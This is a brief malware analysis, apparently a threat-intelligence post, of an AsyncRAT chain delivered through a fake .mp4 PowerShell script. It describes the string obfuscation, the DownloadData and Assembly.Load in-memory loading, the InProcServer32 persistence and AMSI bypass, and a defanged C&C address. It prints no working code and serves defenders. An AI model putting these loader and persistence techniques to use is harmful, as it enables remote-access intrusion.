Important elements of the analysis:
- C&C IP Address
- CMD script of spreading
- PowerShell script downloader
- Fake .mp4 video
- InProcServer32 registry key querying
- Persistence
In the present article we see a quick overview of an AsyncRAT threat which is delivered through a fake .mp4 video via the C&C IP address 92.255.57[.]221.
The .mp4 video is actually a PowerShell malicious script, the script in question is called with a powershell -Command call via a batch CMD script.
The variable $tUslYAEMJo contains the characters "AmYwu" which are replaced with empty character strings and then the C&C URL for the rh.exe artifact is obtained as follows:
The script then downloads the malicious content with DownloadData cmdlet and creates a new assembly object and loads the malicious content downloaded with [System.Reflection.Assembly]::Load function.
rh.exe contacts the IP address 92.255.57[.]221 (following is a disconnection event):
The RAT queries registry keys related to InProcServer32, which could be used to register a server in-process in 32-Bit or to perform persistence and bypassing AMSI.
The IP address 92.255.57[.]221 is recognized as malicious by OSINT sources and related to AsyncRAT, XWorm and FakeCaptcha threats:
At the time of writing the malicious C&C IP address doesn't have opened ports and services and it has been registered in Russia by Chang Way Technologies Co. Limited:
